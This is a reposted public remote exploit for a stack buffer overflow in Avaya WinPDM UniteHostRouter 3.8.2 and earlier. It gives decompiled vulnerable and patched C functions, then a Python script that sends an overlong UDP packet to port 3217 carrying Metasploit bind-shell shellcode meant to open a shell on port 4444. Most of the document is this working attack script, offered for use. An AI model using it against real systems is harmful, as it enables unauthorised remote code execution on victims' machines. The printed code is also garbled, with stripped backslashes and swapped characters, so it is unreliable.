[remote exploits] – Avaya WinPDM UniteHostRouter <= 3.8.2 Pre-Auth Command Execute
# Abysssec Public Exploit
# more info www.abysssec.com
# Avaya WinPDM UniteHostRouter <= 3.8.2 Remote Pre-Auth Command Execute
#A boundary error in the Unite Host Router service (UniteHostRouter.exe)
#when processing certain requests can be exploited to cause a stack-based buffer
#overflow via an overly long string in the "To:" field sent to UDP port 3217.
”’
signed int __cdecl sub_403160(const char *Str, void *a2)
{
char *v2;
char *v3;
const void *v4;
char *v5;
unsigned int v6;
signed int result;
v2 = strpbrk(Str, "nr");
v3 = strpbrk(Str, "/nr");
if ( v3 >= v2 || (v4 = v3 + 1, v5 = strpbrk(v3 + 1, ":/? nr"), v5 > v2) )
{
result = 0;
}
else
{
v6 = v5 – v4;
memcpy(a2, v4, v6); // vulnerable memcpy
*((_BYTE *)a2 + v6) = 0;
result = 1;
}
return result;
}
signed int __cdecl sub_403160_patched(const char *Str, void *a2)
{
char *v2;
char *v3;
const void *v4;
char *v5;
unsigned int v6;
signed int result;
v2 = strpbrk(Str, "nr");
if ( v2
&& (v3 = strpbrk(Str, "/nr")) != 0
&& v3 < v2
&& (v4 = v3 + 1, (v5 = strpbrk(v3 + 1, ":/? nr")) != 0)
&& v5 <= v2
&& (v6 = v5 – v4, (signed int)v6 <= 256) ) // patched by checking <= 256
{
memcpy(a2, v4, v6);
*((_BYTE *)a2 + v6) = 0;
result = 1;
}
else
{
result = 0;
}
return result;
}
”’
from socket import socket, AF_INET, SOCK_DGRAM
data = ‘x55×54x50×2fx31′ # Protocol
data +=’ To: 127.0.0.1′
data+= ‘ /’+"A"*260
data+= "xFBxF8xABx71" # 71ABF8FB call esp W32_SOCK.dll
# win32_bind – EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum
# http://metasploit.com
data += ("xebx03×59xebx05xe8xf8xffxffxffx4fx49×49x49×49x49"
"x49×51x5ax56×54x58×36x33×30x56×58x34×41x30×42x36"
"x48×48x30×42x33×30x42×43x56×58x32×42x44×42x48×34"
"x41×32x41×44x30×41x44×54x42×44x51×42x30×41x44×41"
"x56×58x34×5ax38×42x44×4ax4fx4dx4ex4fx4cx36×4bx4e"
"x4fx44×4ax4ex49×4fx4fx4fx4fx4fx4fx4fx42×56x4bx58"
"x4ex56×46x32×46x32×4bx38×45x44×4ex43×4bx58×4ex47"
"x45×50x4ax57×41x50×4fx4ex4bx38×4fx34×4ax41×4bx58"
"x4fx55×42x52×41x30×4bx4ex43×4ex42×53x49×54x4bx38"
"x46×53x4bx58×41x30×50x4ex41×33x42×4cx49×39x4ex4a"
"x46×58x42×4cx46×57x47×30x41×4cx4cx4cx4dx50×41x30"
"x44×4cx4bx4ex46×4fx4bx33×46x55×46x42×4ax42×45x57"
"x43×4ex4bx58×4fx55×46x52×41x50×4bx4ex48×36x4bx58"
"x4ex50×4bx34×4bx48×4fx55×4ex41×41x30×4bx4ex43×30"
"x4ex52×4bx48×49x38×4ex36×46x42×4ex41×41x56×43x4c"
"x41×43x42×4cx46×46x4bx48×42x54×42x33×4bx58×42x44"
"x4ex50×4bx38×42x47×4ex41×4dx4ax4bx48×42x54×4ax50"
"x50×35x4ax46×50x58×50x44×50x50×4ex4ex42×35x4fx4f"
"x48×4dx41×53x4bx4dx48×36x43×55x48×56x4ax36×43x33"
"x44×33x4ax56×47x47×43x47×44x33×4fx55×46x55×4fx4f"
"x42×4dx4ax56×4bx4cx4dx4ex4ex4fx4bx53×42x45×4fx4f"
"x48×4dx4fx35×49x48×45x4ex48×56x41×48x4dx4ex4ax50"
"x44×30x45×55x4cx46×44x50×4fx4fx42×4dx4ax36×49x4d"
"x49×50x45×4fx4dx4ax47×55x4fx4fx48×4dx43×45x43×45"
"x43×55x43×55x43×45x43×34x43×45x43×34x43×35x4fx4f"
"x42×4dx48×56x4ax56×41x41×4ex35×48x36×43x35×49x38"
"x41×4ex45×49x4ax46×46x4ax4cx51×42x57×47x4cx47×55"
"x4fx4fx48×4dx4cx36×42x31×41x45×45x35×4fx4fx42×4d"
"x4ax36×46x4ax4dx4ax50×42x49×4ex47×55x4fx4fx48×4d"
"x43×35x45×35x4fx4fx42×4dx4ax36×45x4ex49×44x48×38"
"x49×54x47×55x4fx4fx48×4dx42×55x46×35x46×45x45×35"
"x4fx4fx42×4dx43×49x4ax56×47x4ex49×37x48×4cx49×37"
"x47×45x4fx4fx48×4dx45×55x4fx4fx42×4dx48×36x4cx56"
"x46×46x48×36x4ax46×43x56×4dx56×49x38×45x4ex4cx56"
"x42×55x49×55x49×52x4ex4cx49×48x47×4ex4cx36×46x54"
"x49×58x44×4ex41×43x42×4cx43×4fx4cx4ax50×4fx44×54"
"x4dx32×50x4fx44×54x4ex52×43x49×4dx58×4cx47×4ax53"
"x4bx4ax4bx4ax4bx4ax4ax46×44x57×50x4fx43×4bx48×51"
"x4fx4fx45×57x46×54x4fx4fx48×4dx4bx45×47x35×44x35"
"x41×35x41×55x41×35x4cx46×41x50×41x35×41x45×45x35"
"x41×45x4fx4fx42×4dx4ax56×4dx4ax49×4dx45×30x50×4c"
"x43×35x4fx4fx48×4dx4cx56×4fx4fx4fx4fx47×33x4fx4f"
"x42×4dx4bx58×47x45×4ex4fx43×38x46×4cx46×36x4fx4f"
"x48×4dx44×55x4fx4fx42×4dx4ax36×4fx4ex50×4cx42×4e"
"x42×36x43×55x4fx4fx48×4dx4fx4fx42×4dx5a")
data += ‘rnrn’ #nn
port = 3217
hostname = ‘192.168.171.129′
udp = socket(AF_INET,SOCK_DGRAM)
udp.sendto(data, (hostname, port))
print "Send malicius packetn"
print "You Should Got a shell at %s 4444" % hostname
# [1337day.com][1] [2012-01-20]
[1]: http://www.1337day.com/
Leave a Reply